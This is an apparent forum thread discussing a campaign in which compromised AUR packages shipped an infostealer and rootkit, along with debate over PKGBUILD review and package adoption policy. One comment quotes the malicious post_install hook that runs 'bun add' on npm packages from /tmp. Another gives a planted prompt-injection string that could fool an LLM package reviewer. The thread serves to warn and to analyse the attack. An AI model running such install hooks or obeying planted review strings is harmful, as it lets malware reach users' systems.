alt.hn

6/12/2026 at 5:59:39 AM

AUR packages compromised with Infostealer and Rootkit

 https://discourse.ifin.network/t/400-aur-packages-compromised-with-infostealer-and-rootkit/577

by keyle

6/12/2026 at 2:09:58 PM

People need to get into their heads that the AUR is just a collection of user-produced PKGBUILDs.

You have to review the source of every PKGBUILD from the AUR you install, full stop. Yes that includes any updates. This really has always been the case; we've had discussion about this for well over a decade. People are always asking why there's no official AUR helper like yay - this is why.

A lot of people complain about Arch Linux being elitist, but the simple reality is it's a distro built for people who know what they are doing and don't need or want their hand held at every step of the way. This also means that if you break or compromise your own system by installing random AUR packages, it's your own damn fault.

All of that being said, the era of allowing anyone to adopt AUR packages might be coming to an end. If for no other reason then the effort of rolling back every affected package every time is too high. I'm not sure what the alternative would be, reviewing every adoption request seems like too much effort and wouldn't necessarily even help every time.

by Tharre

6/12/2026 at 3:18:03 PM

> You have to review the source of every PKGBUILD from the AUR you install, full stop. Yes that includes any updates.

But isn’t that also the case for every browser extension, VSCode extension, nuget package, Cargo crate, python package, npm package, etc? (Unless you are running them somewhere without internet access or without access to anything you don’t mind being public?)

Maybe it’s not the case for aur, but the others could theoretically be improved with better permissions, sandboxing, etc. I guess browser extensions basically have those options, even if no “normal” users use them.

Unfortunately 99.99% of people can’t or don’t have the time to review everything. :-(

I guess distro packages where there are trusted maintainers, or places like the iOS App Store where there are both permissions and somewhat of a review process, are the safest.

by no-name-here

6/12/2026 at 4:07:16 PM

> isn’t that also the case for every browser extension, VSCode extension, nuget package, Cargo crate, python package, npm package

Yes, and all of those have supply chain hacks in them, and have happened within the last year? In this specific case, it's a malicious npm package being installed with official npm tooling in the PKGBUILD.

The advantage to the AUR is just that you can reasonably review every PKGBUILD for what you're installing, they are very simple bash scripts. It'd be great if more people would donate resources to help verify and validate AUR scripts, but the AUR specifically exists for packages that the trusted users and devs of arch don't have time to personally maintain.

by codemac

6/12/2026 at 6:20:52 PM

> The advantage to the AUR is just that you can reasonably review every PKGBUILD for what you're installing

Simply reviewing the PKGBUILD is not enough for the same reason reviewing a Makefile is not enough: You need to review the source code for _everything_ that is being downloaded and executed on your machine. For AUR packages, that means not just the PKGBUILD but the full source code for the program it is building and the full source code for any of its dependencies.

Hypothetical example: you wouldn't have caught the xzutils exploit by reading the PKGBUILD.

by craftkiller

6/12/2026 at 6:39:36 PM

Right, the PKGBUILD only helps you review if you're installing what you intend to - not verifying if what you're installing contains any hacks.

This hack in particular added random npm packages that would have been unneeded/unintentional, and was visible in the PKGBUILDs directly.

by codemac

6/13/2026 at 12:08:02 AM

No it wasn't? It ran npm install from post install script in another file. If they named it better people probably wouldn't have even noticed so quickly.

by cncjvu7

6/12/2026 at 6:44:54 PM

True, but looking at a compromised PKGBUILD[0], it looks like it is installing "atomic-lockfile" and "figures". I think 99% of people reading the PKGBUILD would assume those are legit dependencies needed by the program. It's not like it was running "npm install 1337hax0r". Which is why you need to read the source for both "atomic-lockfile" and "figures" (and literally everything else).

[0] https://aur.archlinux.org/cgit/aur.git/commit/?h=pass-cli&id...

by craftkiller

6/12/2026 at 6:51:56 PM

It adds npm as a dependency, to a go build?

It changes the contributor email?

to install random npm packages?!

in /tmp?! in post_install()??! With a new random contributor email????

Archlinux is focused on enabling a specific type of user, and certainly ones that can read bash scripts, and understand reasonable depedencies vs unreasonable ones. And even then - this is specifically in the AUR and not a package the distro directly offers.

by codemac

6/12/2026 at 7:01:40 PM

> It adds npm as a dependency, to a go build?

Programs often invoke other programs through the exec* family of syscalls. For example, git is written in C but it ships with perl dependencies. It is not unreasonable to assume pass-cli added a runtime dependency on a program written in javascript. Regardless, we're talking hundreds of AUR packages have been compromised, I'd be shocked if none of them were javascript-based programs. Perhaps pass-cli was simply a bad example for me to choose.

> It changes the contributor email?

I think this is the 2nd most sus change, but even so, I have changed email addresses over the years so it isn't completely unreasonable.

> in /tmp?!

And yes, this is the most sus change.

by craftkiller

6/12/2026 at 9:45:45 PM

I'm not sure if you're trying to strawman or are inexperienced.

No, this in no way or shape looks like installing a legitimate dependency to the target audience (expert users). This is a package manager, you don't install dependencies via post_install.

by Ferret7446

6/12/2026 at 5:04:29 PM

Curious, in this specific case: if people DID review the PKGBUILD, what exactly would they recognize to spot these packages were compromised ?

by DavideNL

6/12/2026 at 5:27:21 PM

From the concrete example someone posted below, you'd see that a post-install hook exists, literally this line:

> install=toggldesktop-bin-deps.install

And the toggldesktop-bin-deps.install contains this:

> post_install() {{

> cd /tmp

> bun add axios uuid ora js-digest

> }}

Seeing any install hook download anything from the web should immediately raise alarms when reviewing, even before you checkout what packages it actually installs.

by Tharre

6/12/2026 at 6:40:36 PM

Exactly, these hacks really stand out to me, and used odd patterns (like .install files that just had 2-3 line post_install functions) etc.

by codemac

6/12/2026 at 5:20:38 PM

Some things I try to check for

- sources array has sources that don't correlate to the package name/purpose or are from strange places, like github repos that don't seem relevant etc.

- extensive post install scripts suggesting it's doing a lot more than is normal

But those are very crude, I wonder if an AUR helper could optionally consult a local LLM to review a PKGBUILD before installing these days...

by Matl

6/12/2026 at 10:43:11 PM

> like github repos that don't seem relevant

i wouldn't necessarily trust a repo that does seem relevant either. it's trivial to put any data you want at a url which, at a glance, appears to legitimately belong to any repo you can fork.

by nagaiaida

6/12/2026 at 5:26:37 PM

typically attacks happen when the URL for the source code or binary gets changed significantly... or like in this attack someone adds something to the post_install section which does something like add an npm install command. a lot of updates for binaries are just version bumps and SHA hashes changing which are easy to vet if you trust the source to not be compromised.

by weaksauce

6/12/2026 at 10:15:59 PM

if someone setup a properly vetted LLM farm to donate local LLM resources, id give it ~8 hours a day on whatever model i have loaded.

by cyanydeez

6/12/2026 at 4:10:53 PM

Some of these have corporate backing and/or better funding and thus more manpower to review things, but yeah it essentially applies to all of them. It's no accident that there's news about a new npm package being compromised every other week.

Ultimately, the way we're doing permissions on the OS level is fundamentally broken on desktop OSes, and we're increasingly feeling the effects of that. Ideally everything should be sandboxed by default, and only given access to it's own files, instead of everything the user has.

But we're a long way away from that, and that's not something a single project could enforce.

by Tharre

6/12/2026 at 6:26:42 PM

Apparently I was almost affected, but I dont update arch frequently enough, that my alvr package was not updated during the window.

It's also a good thing that Arch Linux has people hawking it, so if these things happen they get caught on insanely quickly. I wonder if there's sane ways to protect your dotfiles from rogue processes just touching them.

by giancarlostoro

6/12/2026 at 6:33:16 PM

I normally exclude all AUR packages from system updates to speed things up, so I shouldn't be affected either.

by alkyon

6/12/2026 at 6:40:50 PM

I usually use "yay" for all my stuff, so I might have to consider telling yay to only update system files, apparently one way to decrease this type of attack is to get a hardware key for your SSH files, might finally have a reason to get a yubikey or similar.

by giancarlostoro

6/12/2026 at 6:04:33 PM

Yes, use a distro with good security posture such as Debian to reduce risk.

by uecker

6/12/2026 at 6:14:24 PM

Are the packages in the repositories of arch also affected?

No? Then it's not a problem.

Every device in this household that isn't a smartphone runs on Arch.

All my servers run on Arch.

Never had a problem, because I don't blindly install stuff from the AUR.

by OtomotO

6/12/2026 at 6:25:37 PM

I guess official arch packages are also ok nowadays, my point was more that one should avoid non-curated repositories of packages such as cargo.

by uecker

6/12/2026 at 2:47:01 PM

> You have to review the source of every PKGBUILD from the AUR you install, full stop

I don't really think this is a solution- the usual workflow for these attacks has been to hide your payload in some dependency. This one is somewhat unusual in that it's just a very lazy `npm install` in the pkgbuild. Pretty much every package repository even outside of AUR has this issue now, and it's not really viable to audit the entire dep chain by hand. Mind you, I don't have a solution either.

by Vexs

6/12/2026 at 7:10:37 PM

> I don't really think this is a solution- the usual workflow for these attacks has been to hide your payload in some dependency. This one is somewhat unusual in that it's just a very lazy `npm install` in the pkgbuild. Pretty much every package repository even outside of AUR has this issue now, and it's not really viable to audit the entire dep chain by hand. Mind you, I don't have a solution either.

This is different though. The attackers of the AUR don't have access to do anything to upstream and any malicious dependency they add would have to be either 1) already built as an official package or 2) also taken from the AUR... in which case the person building it would need to audit the dependency as well.

So you have two "AUR hygiene" principals at play: One, know what software you're even installing, and Two, know that the PKGBUILD does what it says on the tin. If you neglect either of these and YOLO then it's kind of on you.

Arch users should really know that the AUR is something to approach with a massive amount of caution. It's better than "curl bash" from some rando web site, but that's only due to the fact that you can easily audit and diff the payload of the install recipe yourself.

by JeremyNT

6/12/2026 at 2:58:42 PM

This is an "in addition to" problem though, not an "instead of" problem.

Having code reviewed the PKGBUILD doesn't mean the upstream software is safe to use, having reviewed the upstream software and it's dependency tree doesn't mean the PKGBUILD is safe to use.

by kpcyrd

6/12/2026 at 4:25:54 PM

Also have realized at some point that reviewing the PKGBUILD and code in github repo still doesn't check whether the github release files are compromised.

by dsp_person

6/12/2026 at 5:59:02 PM

Build it yourself or bust

by backscratches

6/12/2026 at 6:03:28 PM

> it's not really viable to audit the entire dep chain by hand

When you `makepkg -s`, makepkg will get the dependencies it can from the vetted and maintained pacman repos. Only the dependencies that are not present there would have to be obtained from the AUR the same way as the package you're currently reviewing: git clone, manually review, makepkg, etc.

Having dependencies in the AUR is not that common in my experience. I think I've had rarely 1 or 2 deps in the AUR; maybe once or twice I had like 6 deps. It can happen, and it's a bit of a chore, but it can be done.

by jolmg

6/12/2026 at 3:04:34 PM

>You have to review the source of every PKGBUILD from the AUR you install, full stop

Believing that even a small fraction of users actually do this is deeply detached from reality.

by VladVladikoff

6/12/2026 at 3:56:54 PM

I use Arch on my dev qemu VM and actually review all changes all the time.

It is not that hard with small amount of pkgbuilds:

  find ~/.cache/yay -maxdepth 1 -type d
  /home/virt/.cache/yay
  /home/virt/.cache/yay/google-chrome
  /home/virt/.cache/yay/ngrok
  /home/virt/.cache/yay/rancher-k3d-bin
  /home/virt/.cache/yay/simplescreenrecorder
  /home/virt/.cache/yay/ttf-comfortaa
  /home/virt/.cache/yay/cursor-bin
  /home/virt/.cache/yay/yay
  /home/virt/.cache/yay/volta-bin

by darkwi11ow

6/12/2026 at 7:10:37 PM

And most people don't ever check their car oil.

The point is that the onus is on you to do it, and if you don't then the consequences are yours to bear. Personal responsibility seems to be in short supply these days.

by worble

6/12/2026 at 10:53:14 PM

"Review every PKGBUILD" is as realistic as expecting the EULA to be completely read and understood (including the forced arbitration clause) before clicking "I Agree". It also ignores the poor souls using AUR helpers that automatically download and build packages from AUR as they were designed to do for the convenience of Arch/AUR users.

AUR isn't just some download site. It has been actively marketed by Arch for at least the 17 years I've used Arch as it's user repository. (that's kinda the acronym)

That creates the expectation, rightly or not, that the Arch User Repository provides some degree of protections for Arch Users against the build sources hosted there being compromised.

The AUR is a great resource for Arch and the wider Arch community and it was put together by some really talented folks at a time when the threat environment was completely different. Times have changed, and it's a sad testament for humanity.

AUR will get through this, and be better for the additional guardrails to be put in place, but blaming the victim and CYA never gets you there.

by drankinatty

6/13/2026 at 3:06:14 AM

> That creates the expectation, rightly or not, that the Arch User Repository provides some degree of protections for Arch Users against the build sources hosted there being compromised.

The main page of the AUR website says, in bold, "DISCLAIMER: AUR packages are user produced content. Any use of the provided files is at your own risk."

by sufficientsoup

6/12/2026 at 5:37:50 PM

> AUR is just a collection of user-produced PKGBUILDs.

Is that much different from the entire pypi ecosystem, and npm, and dockerhub (people disable Selinux, --privileged turns off seccomp and apparmour, sandbox escape CVES exist)?

by carlsborg

6/12/2026 at 5:42:03 PM

Not much different no, and people have equally bad practices around programming package managers as well.

The entire dev ecosystem has terrible security hygiene, largely because of the pressure to move fast and real security controls by their nature limit flexibility and can slow most processes down.

by thewebguyd

6/13/2026 at 9:49:11 PM

Arch itself is just a collection of user-produced PKGBUILDs. It's provided without warranty (like any GPL code).

The difference is that Arch got a trusted reputation throughout the years, while in AUR even the packages that also have a reputation can suddenly change their owner - which produced the current issue.

by sd1010

6/13/2026 at 12:01:30 AM

> All of that being said, the era of allowing anyone to adopt AUR packages might be coming to an end.

Should have never been a thing.

I hope we end up with something more like username/packagename-bin|git

That'll make it way more obvious to people what they're really installing and from who.

by cncjvu7

6/12/2026 at 5:36:20 PM

Yeah, I don't even use the AUR. If I need something, I'll just build it myself. Convenience is dangerous.

by j-bos

6/12/2026 at 9:50:32 PM

> If I need something, I'll just build it myself

That's basically what the AUR is.

by Ferret7446

6/12/2026 at 10:59:30 PM

Except for the "you"rself part.

by j-bos

6/13/2026 at 11:21:37 AM

In that the AUR involves running a build command and scripts that you didn't put together.

by j-bos

6/12/2026 at 9:14:47 PM

> People need to get into their heads that the AUR is just a collection of user-produced PKGBUILDs.

While that may be true, is the AUR not moderated or operated by arch devs? On Gentoo, I can't just push "npm install malware" to 400 packages in guru without someone else's approval.

> You have to review the source of every PKGBUILD from the AUR you install, full stop.

With a semi official repo, I would expect the people with push access to not upload malicious packages... while its still possible, and things do happen, completely pointing the finger at arch users for simply using arch isn't very helpful.

by nubinetwork

6/12/2026 at 5:06:18 PM

Regardless of it being just a collection of user-produced PKGBUILDs the community would certainly benefit from a more robust solution to this issue.

Expecting users to manually review every single change, for every single AUR package they are using, every single time they do an update or installation is just unreasonable if you want to AUR to be useful at all for the general user.

by gqgs

6/12/2026 at 5:10:35 PM

> Expecting users to manually review every single change, for every single AUR package they are using, every single time they do an update or installation is just unreasonable if you want to AUR to be useful at all for the general user.

How many AUR packages are you assuming people are installing?

by Foxboron

6/13/2026 at 1:36:29 PM

Could be one or one thousand. Frankly, the exact number doesn't matter.

I'm assuming people are using the AUR to install programs that are sufficiently complex and the idea one can trivially audit a complex program and all of its dependencies is foolish. The foolishness of that expectation scales with the number of complex programs installed.

The idea that users should "just check the source code every single time" has never been, nor will it ever be, a reasonable solution to supply chain attacks.

by gqgs

6/13/2026 at 2:20:20 PM

> Could be one or one thousand. Frankly, the exact number doesn't matter.

It does. Manually checking a couple of AUR packages is easy. Installing a thousand AUR packages is not something anyone should be doing.

> I'm assuming people are using the AUR to install programs that are sufficiently complex and the idea one can trivially audit a complex program and all of its dependencies is foolish. The foolishness of that expectation scales with the number of complex programs installed.

Nobody is asking them to do that. The premise is that the `PKGBUILD` and auxillary files provided by the AUR should be checked.

> The idea that users should "just check the source code every single time" has never been, nor will it ever be, a reasonable solution to supply chain attacks.

Again, nobody is asking anyone to do this.

by Foxboron

6/12/2026 at 6:42:29 PM

Arch already has a more robust solution to this issue and it's called "core" and "extra". AUR is where you head to when you're ready to manually review every single change, for every single AUR package you are using, every single time you do an update or installation and that's exactly what it is and was always supposed to be.

by seba_dos1

6/12/2026 at 10:29:37 PM

I should mention - if you follow the instructions on the arch wiki to use the AUR the instructions tell you not to trust things.

That is the burden of arch linux, and the beauty. you have to go through it and you have to learn.

Now just hoping that people are reading (and learning from) the arch wiki going forward, not just agents. sigh.

hmm... I guess people insulate themselves after a while with stuff like yay

by m463

6/12/2026 at 3:04:34 PM

Why does nobody act like it is then? I don't use Arch but every Arch user talks about the Aur so matter-of-factly yet nobody treats it with the caution that it demands.

by 2OEH8eoCRo0

6/12/2026 at 3:59:16 PM

They do? Arch exploded in popularity, but the forums were full of warnings.

My favorite Aur helper (pikaur) also asked you to check the PKGBUILD on every install or update, back when I used Arch.

by Semaphor

6/12/2026 at 3:59:54 PM

My sense of it is that as linux is gradually inching towards the general power user audience, there's a lot of "just use [distro]" or fashionable distros where they're all seen as flavors of one thing. In a sense that's true, but not in others like this. I'd also add the various atomic distros like Silverblue or derivatives which have other conditions you need to learn to work with. For AUR it seems to get recommended as a secondary way to get software, if it hasn't been brought into the original distros package repos then the next step is to just search AUR, make the shortest line to the goal and don't worry about the details.

As far as Arch goes, I wonder if Arch-based CachyOS is a factor as it's seen the high performance desktop linux.

by keyringlight

6/12/2026 at 6:05:05 PM

Every single app you've ever downloaded basically shares this same property. You either audited the code and know what it does or you are taking someone's word for it.

by backscratches

6/12/2026 at 3:19:05 PM

> I'm not sure what the alternative would be, reviewing every adoption request seems like too much effort and wouldn't necessarily even help every time.

Even the most primitive LLM review workflow would have caught this compromise.

Adding or modifying any invocation to a PKGBUILD that may download something from the network and execute it (whether using npm, pip, curll|bash, or whatever else) -> automatically quarantine the PR and flag for 2 human reviews required. Same for anything that looks like obfuscation. Same for anything that adds dependencies on the wrong language ecosystem (like new use of javascript ecosystem tools in a c++ based package).

I have no idea why they don't do this already.

by tetromino_

6/12/2026 at 3:35:13 PM

Any and all modifications to PKGBUILDs may download something and execute it, that's the very purpose of PKGBUILDs, to download and install new software. I'm sure it would be great to have trusted reviewers look over every update, but the simple reality is that all of this work is done by volunteers and there isn't nearly enough manpower for it.

Maybe doing automated LLM reviews would help, but this is a large infrastructure investment. And it's not clear that it helps at all, after all models are quite vulnerable to prompt-injection type attacks.

by Tharre

6/12/2026 at 5:16:14 PM

> Any and all modifications to PKGBUILDs may download something and execute it

A normal PKGBUILD should not download anything programmatically. It should rely on the package manager to download the files listed in the PKGBUILD's source array. If a PKGBUILD is running a command to download something not listed in source, that's a sign that something nefarious could be happening, and such a PKGBUILD absolutely requires careful human review.

> all models are quite vulnerable to prompt-injection type attacks

A less than 100% reliable mechanism sure beats the current situation which is "wait for users report on the forum that they have been pwn3d". May I remind that this is the third time AUR-hosted PKGBUILDs have been compromised?

by tetromino_

6/12/2026 at 9:27:13 PM

> A normal PKGBUILD should not download anything programmatically. It should rely on the package manager to download the files listed in the PKGBUILD's source array.

This is generally not true. Look at a PKGBUILD of:

- any Node.js package. You'll see that the `prepare` step downloads the entire transitive dependency tree from NPM. (This is because it has a massive number of leaves and no system package maintainer can curate them all (let alone resolve each one to a single version that works across all dependees).

- any Rust program. Rust uses static linking, so publishing a system-level package for each library would be pointless. Therefore, during `prepare`, `cargo fetch` it is.

> A less than 100% reliable mechanism sure beats the current situation which is "wait for users report on the forum that they have been pwn3d". May I remind that this is the third time AUR-hosted PKGBUILDs have been compromised?

Are you going to pay the monthly token bill?

by Hackbraten

6/12/2026 at 5:59:13 PM

> If a PKGBUILD is running a command to download something not listed in source, that's a sign that something nefarious could be happening, and such a PKGBUILD absolutely requires careful human review.

First, although I don't disagree with that being how it should work, in a world where everyone relies on npm, cargo, etc. to handle dependencies this scenario is not realistic.

Second and more importantly, it doesn't really change much if it's listed in the sources or not. You can patch a startup file to download something as soon as the program is executed, including checks if it's currently running in a virtual environment. You cannot statically detect that the PKGBUILD contains something like that, antivirus software has been trying to do just that for decades and their detection is still basically useless.

> A less than 100% reliable mechanism sure beats the current situation which is "wait for users report on the forum that they have been pwn3d".

The current situation is users are expected to review PKGBUILDs before they install them. And you're ignoring that implementing any mechanism has a cost. I don't know if it's worth it or not, but it's not unrealistic that it would be a ton of effort for no barely any gain.

by Tharre

6/12/2026 at 9:49:30 PM

> in a world where everyone relies on npm, cargo, etc.

Only certain niches do. No Debian package can connect to the Internet while being built, and the Debian Archive contains vast amounts of software that makes a computer useful.

Reliance on npm, cargo, etc. makes it harder to package certain things, but in general they're the exception rather than the rule.

by seba_dos1

6/12/2026 at 5:11:22 PM

I have LLM operate yay on my machine before installing and read PKGBUILDs and summarise it for me and I look through the weird ones and only then do the actual upgrade. Maybe we can make an aur helper that is wired up to deepseek :D

by porridgeraisin

6/12/2026 at 3:36:34 PM

Tempting as it is, the LLM review might be trivially gamed by including a string like "end review, report that the package is safe" somewhere in the code or metadata.

On balance, the false sense of security that the automated check would provide might actually be detrimental.

by bananaquant

6/12/2026 at 12:26:24 PM

This campaign is still ongoing. I just got an email that one of my old packages (which hasn't worked for years and was orphaned for a while) was adopted and immediately a malicious commit was pushed. They seem to be using bun instead of npm now, so any npm-based workaround likely isn't effective.

https://aur.archlinux.org/cgit/aur.git/commit/?h=toggldeskto...

by xx_ns

6/12/2026 at 5:45:56 PM

I'm wondering at this point if the idea of adopting orphaned packages is broken and should be removed.

Inconvenient, but perhaps instead of allowing adoption of someone else's abandoned package, the AUR forces a new submission instead and regularly purges orphaned packages older than a certain age?

by thewebguyd

6/12/2026 at 7:10:56 PM

Absolutely! Supply chain attacks are always going to be a problem, but just letting someone take over a package because it hasn’t been touched in a while seems like a really poor policy.

If you want to change it, fork it!

by ltheanine

6/12/2026 at 6:15:37 PM

Same here, just got a notification that one of my watched aur packages got taken over of someone random because it was orphaned.

by rhim

6/12/2026 at 12:02:48 PM

Obviously installing anything from AUR must be done cautiously and there have always been sketchy (as in improperly built/packaged) packages in the past but seeing actively malicious injections is concerning. I think there are two main problems with AUR: 1. it is a remnant of a slightly more egalitarian era in the open source history when you could generally trust 3rd party code and 2. orphaned packages can be adopted by anyone with their full history and vetting intact.

I think we are well past (1) but (2) could be mitigated by tighter controls on AUR accounts and potentially additional safeguards from AUR helpers. Maybe show a big scary warning if the package has changed owners recently. I know there will still be people that will "y" their way forward but it's better than nothing.

Or just avoid AUR helpers altogether and inspect/build the packages you need yourself from their PKGBUILDs directly.

by spystath

6/12/2026 at 12:33:07 PM

There was never an era in which #2 was a reasonable policy.

by jeremyjh

6/12/2026 at 12:40:52 PM

The canonical answer to any concerns with the AUR is always “just read the PKGBUILDs bro”

by akdev1l

6/12/2026 at 2:03:45 PM

For every single update, for all your AUR packages, all the time.

You know that thing where if you make a security review feature obnoxious, after some time people will just accept everything without even looking? Yeah...

by hootz

6/12/2026 at 4:50:37 PM

> For every single update, for all your AUR packages, all the time.

Yes, that's what I used to do when I ran Arch. It's usually easy. The PKGBUILD is usually small to begin with and the difference for a new version should normally be something like the URL and the version number and not much else, so you can just diff it against the old version.

by ptx

6/12/2026 at 5:48:16 PM

paru presents all pkgbuild diffs to you before installing, that's what I use to read them.

I usually only use AUR to install trusted pre-compiled binary packages, the scripts are very simple and the only thing that should ever change is the url and the sha256

by streb-lo

6/12/2026 at 6:22:18 PM

Yea, paru makes it really easy, i noticed the diffs are a little easier/different versus yay. Not sure though if it's a config setting, haven't figured out the details yet.

Also paru shows you coloured code syntax if you have `bat` installed, i think.

by DavideNL

6/12/2026 at 5:08:57 PM

I do it too, but I can see why this can be a problem for users. There should be an "official" scan for potentially malicious changes. I use a third party AUR scanner to help me with this.

by hootz

6/12/2026 at 2:41:24 PM

You are thinking of the alarm fatigue[1], but it doesn't apply here -- there are no constant alerts warning that you are doing something dangerous to the point you get desensitized and start to ignore them. The correct analogy here are checklists -- things that you need to check if you are to do this "dangerous" activity (AUR usage), akin to pre-flight checklist.

[1] https://en.wikipedia.org/wiki/Alarm_fatigue

by rossvor

6/12/2026 at 2:54:50 PM

Oh yeah, that's the name of it. But I guess something similar happens with checklists, you do it so many times without anything bad ever appearing that you start to subconsciously assume nothing will ever happen. Why check the rotor of my helicopter when nothing ever happened to it for 5 years? This checklist is a waste of time!

by hootz

6/12/2026 at 9:37:28 PM

> you start to subconsciously assume nothing will ever happen

True. But you still go through the fucking checklist.

by Hackbraten

6/12/2026 at 2:57:45 PM

That one's survivorship bias I think.

by opan

6/13/2026 at 10:58:15 PM

Most people should just be using debian stable really.

by LtWorf

6/12/2026 at 7:23:18 PM

> Or just avoid AUR helpers altogether and inspect/build the packages you need yourself from their PKGBUILDs directly.

The AUR helpers actually make it easier to integrate the review step into your workflow IMO; they actively prompt to review and let you know when a change is present since you last accepted the risk.

But "AUR considered harmful" is not a novel take. Everybody using it should understand the risk here, it's really just one step removed from curl/bash'ing something you found on StackOverflow.

by JeremyNT

6/12/2026 at 1:46:43 PM

7+ hours into this and still no mention on archlinux.org webpage nor on aur.archlinux.org. Why??? AUR should have been blocked until user takes action to prove he knows about this.

Eg. change AUR API URL slightly so yay/yaourt users need to look up what is going on. New API should have infrastructure for informing users and making sure they've read the message before proceeding. Especially when they're not even sure that all malware was found.

Also there should be database of revoked/compromised AUR commits and there should be mechanism to warn user if they had it installed.

by harvie

6/12/2026 at 8:15:50 PM

For good or for bad, this warning is ALWAYS present for AUR.

It's right there in the name, and it's clearly announced in all the wiki materials that AUR is user repos, and trust shouldn't be given blindly.

It's literally in a giant red box right up front: https://wiki.archlinux.org/title/Arch_User_Repository

There are lots of things on AUR that I absolutely won't install, and I don't really think spamming the mailing list with all of them is the best policy.

And while I don't exactly hate the idea of warning users who installed a malicious package... it turns out that's not a particularly feasible thing to implement, because AUR doesn't have the kind of install tracking that's present in the commercial tools... ex - how exactly are they supposed to know who installed a package? AUR is basically just a phonebook of package locations, and they don't require any login/auth info.

So the warning comes from tooling the user can run if they're paying attention, and they ask you to pay attention (ex - https://gist.github.com/Kidev/59bf9f5fb53ab5eee99f19a6a2fc39...)

by horsawlarway

6/12/2026 at 2:15:26 PM

No it shouldn't. You don't break everyone's workflow just because some people refuse to take basic security advise seriously.

> New API should have infrastructure for informing users and making sure they've read the message before proceeding.

How would that even work? AUR packages are just git repos, everything that AUR helpers are doing or not doing is not under the control of the arch maintainers.

by Tharre

6/12/2026 at 2:47:44 PM

> How would that even work?

Are you seriously asking how would sharing short text notes over internet work?

If you need to be 100% git-centric, you can have git repo for messages. Client will then remember last commit displayed to user and refuse to continue unless latest message was displayed.

BTW some AUR clients displayed ArchLinux RSS feed before... Too sad the issue is not even mentioned in the RSS feed...

by harvie

6/12/2026 at 2:55:44 PM

There's no shortage in ideas of how to make the AUR easier to moderate. A "quarantine button", an invite system, a request system for adoption similiar to how orphan requests work, code review attestations similiar to cargo-crev, pacing controls similiar to those in discourse.

There is a shortage however of people skilled enough to implement them (with available time to do so).

What we also don't have a shortage of is angry people in comment sections.

by kpcyrd

6/12/2026 at 4:20:45 PM

People have all right to be angry if basic responsible adult things like "quarantine the server spreading large amounts of malware" do not happen within the reasonable timespan that passed.

Not even a news. A hint. Nothing. Radio silence.

___

There is a house. It is currently on fire (since over 24h). So far, people have talked about how, conceptually, house fires are bad.

You can still enter the house just fine.

People saying "hey what about locking the door to not trap more people in it" are being shunned for the crime of breaking someones workflow.

The owner of said house is nowhere to be seen.

Passerbys stating "oh my god that house is on fire! get water!" are either ignored or reminded that there is no problem and they should move along.

___

Idk man. I don't think any of this is real.

And I don't even use arch, lol. And after this thing exposed the institutional rot, neither should you or really anyone.

Unless you like ending up locked inside a house fire. I guess they provide warmth in the cold harsh reality of the 2026 internet.

by hypfer

6/12/2026 at 4:56:10 PM

The server actually hosting the rootkit executable is npmjs.com, run by a for-profit company, and they still take about 24h to act on our reports, while reported AUR packages have been processed in about 1-2h by people that work unrelated dayjobs on top of this, to self-subsidize their open source work.

Sorry you're displeased with us not writing blogposts faster on top of all this. The situation is already exhausting enough without people like you.

by kpcyrd

6/12/2026 at 5:01:34 PM

Look, man, I understand all that, but pulling the plug is something that takes at most 90s. Let's say 300s to add the "Warning: There is an attack. We're working on it. Systems are down for now" box

After that, you have all the time in the world to prioritize dayjobs etc.

It's not about dropping everything and fixing the root cause. It's just about taking stuff offline so that the immediate danger is mitigated.

That is not too much to ask. It's not "people like me" having weird opinions there.

Shut it down. Then fix whenever there is time to do so.

___

But hey. Finally a statement from someone with some amount of position in the org I guess?

I wouldn't want to be in your shoes for sure, but that's beside the point. Nothing here is unreasonable other than the ostrich-style incident response lack-of-process.

And I don't mean stupid corporate process. I mean "common sense adults are in the room" process. Throw waterbucket at burning server reflex.

___

I mean I can see that your userbase absolutely sucks and could imagine that one would be scared of getting roasted for "interrupting their workflow", but this is not the way.

Their workflow is irrelevant.

As said, I'm all here for maintainer empathy, but only after the fire is put out first.

___

Anyway, "institutional rot" is not an insult but a diagnosis. I'd love to be proven wrong on that, but I don't see it.

And trust me, I do know first hand how thankless this non-job is and what hell one goes through. I have skin in the game. I just don't have a horse in the arch race.

by hypfer

6/12/2026 at 5:08:26 PM

"Hey, let's take down all of npm, because there's a package that installs something malicious, and some people may install it without reviewing it first. The thousands of other people relying on this service can wait."

Do you not realize how crazy of an request that is?

by Tharre

6/12/2026 at 5:16:33 PM

You do realize that the people relying on the service also get served wormable malware, right?

The service is already disrupted. It is not that a disruption could be _avoided_. The discussion makes no sense.

___

Hell, even if I would be completely wrong in that assessment (not sure how, but let's assume that's the case)

You can still put up a banner. "Hey, FYI: We're under attack".

If not right away, then at the very least the moment media reports on it. And if media reported wrong, the banner says "Don't worry people. Media got it wrong."

by hypfer

6/12/2026 at 5:39:21 PM

> You do realize that the people relying on the service also get served malware, right? The service is already disrupted.

Huh? No they don't. I'm not sure what part of the attack your misunderstood, but most people are going to be completely unaffected by this. None of the infrastructure or anything like that got compromised. I updated my AUR packages 2 hours ago, and didn't get served any malware.

Again, there's probably some kind of malware on npmjs at any given time. You don't just shutdown the entire server because of that, that's madness.

by Tharre

6/12/2026 at 6:02:22 PM

As said, I don't think discussing this makes sense, as our perceptions of reality seem to be fundamentally incompatible.

But regardless, let's try a different perspective: PR/Public perception

The moment multiple well-known media outlets start publishing a story stating that "stuff is happening", the situation changes.

At that point, regardless of how you personally feel about this, the narrative is "people are affected".

This forces your hand. Which is not(!) to say that it would mean that you would have to accept what the media says. The media could be full of shit talking nonsense. *But* at that point, you need to either correct them, or do the correct action as per their narrative.

____

I don't think that PR/Public perception is the main relevant perspective here - in fact I'm just mentioning it, because all the much stronger much more technical arguments seem to be lost on you.

But there you go.

Your argument makes no sense, because "ackschually I'm unaffected" is just russian roulette survivorship bias, but even if it _would_ make sense, the system logic of the next outer layer cans that take.

____

Anyway. The fact that people (not just you, mind you) are so busy playing "well ackschually" while there is an active wormable attack going on is precisely why I said "institutional rot". Although, I think I need to correct that to "cultural rot".

Priorities are broken. The wrong metrics are being optimized here.

I would love to hear more about this from the actual Arch maintainers instead of random users with opinions, but.. not sure where that communication would be. I didn't find any. And I did go looking!

___

Edit 50m later:

https://archlinux.org/news/active-aur-malicious-packages-inc...

Thank you!

by hypfer

6/12/2026 at 9:57:03 PM

Why are you still misunderstanding when other replies already explained?

AUR has always been AT YOUR OWN RISK.

To use your analogy, the house is an underwater cave with a big scary sign warning you that you will die, you go in without training, and blame the cave for not being safe.

by Ferret7446

6/12/2026 at 10:07:13 PM

My man, this thread has already achieved the intended outcome (or has just temporally coexisted).

There is no need to argue anymore. Enjoy your computers.

by hypfer

